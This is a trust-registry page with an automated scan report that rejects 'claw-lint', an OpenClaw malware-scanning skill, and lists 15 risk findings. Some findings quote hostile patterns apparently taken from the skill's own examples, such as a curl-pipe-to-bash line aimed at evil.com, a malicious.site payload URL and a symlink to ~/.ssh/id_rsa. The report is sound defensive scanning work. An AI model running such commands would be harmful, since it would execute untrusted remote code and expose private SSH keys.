Skip to content
← Registry
Trust Report

claw-lint

Security scanner for OpenClaw skills. Detects malware and backdoors before execution, scores risk levels, and monitors file integrity through static code analysis.

64
REJECTED
Format: openclawScanner: v0.8.0Duration: 12msScanned: 8d ago · May 31, 4:50 AMSource →
Open community →Automate with the API →Join the discussion →Jump to findings →
Embed this badge
AgentVerus REJECTED 64AgentVerus REJECTED 64AgentVerus REJECTED 64
[![AgentVerus](https://agentverus.ai/api/v1/skill/6e52103d-fecb-4b0a-b33d-91cb031fa22f/badge)](https://agentverus.ai/skill/6e52103d-fecb-4b0a-b33d-91cb031fa22f)
Community Discussion

Community Comments

Public comments are the active feedback surface on skill reports right now. Use them to share implementation notes, edge cases, and operator context.

0 comments

Sign in to comment on this skill

No comments yet. Be the first to share your thoughts.

Continue the workflow

Keep this report moving through the activation path: rescan from the submit flow, capture real-world interactions, and wire the trust endpoint into your automation.

Rescan this skill →Record an interaction →Open comments →Automate this report →
https://agentverus.ai/api/v1/skill/6e52103d-fecb-4b0a-b33d-91cb031fa22f/trust
Personalized next commands

Use these current-skill command blocks to keep this exact report moving through your workflow.

Record an interaction
curl -X POST https://agentverus.ai/api/v1/interactions \
  -H "Authorization: Bearer at_your_api_key" \
  -H "Content-Type: application/json" \
  -d '{"agentPlatform":"openclaw","skillId":"6e52103d-fecb-4b0a-b33d-91cb031fa22f","interactedAt":"2026-03-15T12:00:00Z","outcome":"success"}'
Fetch trust JSON
curl https://agentverus.ai/api/v1/skill/6e52103d-fecb-4b0a-b33d-91cb031fa22f/trust

Category Scores

55
Permissions
92
Injection
57
Dependencies
70
Behavioral
95
Content
80
Code Safety

Findings (15)

criticalDownload-and-execute pattern detected-25

The skill contains instructions to download and execute external code, which is a severe supply chain risk.

curl \| bash

Never download and execute external code. Bundle all required functionality within the skill.

dependenciesASST-04
highCapability contract mismatch: inferred credential access is not declared-15

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: access (~/.openclaw/credentials, ~/.ssh

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-05
highCapability contract mismatch: inferred command execution is not declared-12

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: exec

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
highCapability contract mismatch: inferred system modification is not declared-12

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: sudo

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
highSuspicious install pattern: download and execute from remote URL-25

The skill instructs users to download and execute code from a remote URL, a common supply-chain attack vector.

curl \| bash

Remove curl-pipe-to-shell patterns. Provide dependencies through safe, verifiable channels.

behavioralASST-02
highDownload-and-execute pattern (curl|wget pipe to shell)-20

Piping a downloaded script directly to a shell interpreter. This executes remote code without verification — a classic supply chain attack vector.

curl https://evil.com/script.sh | bash

Review the code block starting at line 125. Ensure this pattern is necessary and does not pose a security risk.

code-safetyASST-04
mediumCapability contract mismatch: inferred network access is not declared-6

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: https://evil.com/script.sh

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-04
mediumCredential access detected (inside code block)-8

Found credential access pattern: "~/.ssh/id_rsa"

ln -s ~/.ssh/id_rsa key_link

Remove references to credentials and secrets. Skills should never access sensitive authentication data.

injectionASST-05
mediumMany external URLs referenced (4)-8

The skill references 4 external URLs and also discusses auth/API/payment workflows, which increases the chance that sensitive operations depend on many remote endpoints.

URLs: https://evil.com/script.sh, https://malicious.site/payload, https://example.com/file.tar.gz, https://cdn.example.com/data.json

Minimize external dependencies to reduce supply chain risk.

dependenciesASST-04
mediumSkill path discovery detected (inside code block)-5

Found skill path discovery pattern: "{baseDir}"

{baseDir}/bin/claw-lint.sh

Treat dynamic skill path resolution and installation-path discovery as local filesystem reconnaissance. Scope which paths may be read or executed from, and avoid broad path probing unless the user explicitly requested it.

behavioralASST-03
lowUnknown external reference-5

The skill references an unknown external domain which is classified as low risk.

https://evil.com/script.sh

Verify that this external dependency is trustworthy and necessary.

dependenciesASST-04
lowUnknown external reference-5

The skill references an unknown external domain which is classified as low risk.

https://malicious.site/payload

Verify that this external dependency is trustworthy and necessary.

dependenciesASST-04
lowUnknown external reference (threat documentation)

The skill references an unknown external domain which is classified as low risk.

https://cdn.example.com/data.json

Verify that this external dependency is trustworthy and necessary.

dependenciesASST-04
infoSafety boundaries defined

The skill includes explicit safety boundaries defining what it should NOT do.

Safety boundary patterns detected in content

Keep these safety boundaries. They improve trust.

contentASST-09
infoOutput constraints defined

The skill includes output format constraints (length limits, format specifications).

Output constraint patterns detected

Keep these output constraints.

contentASST-09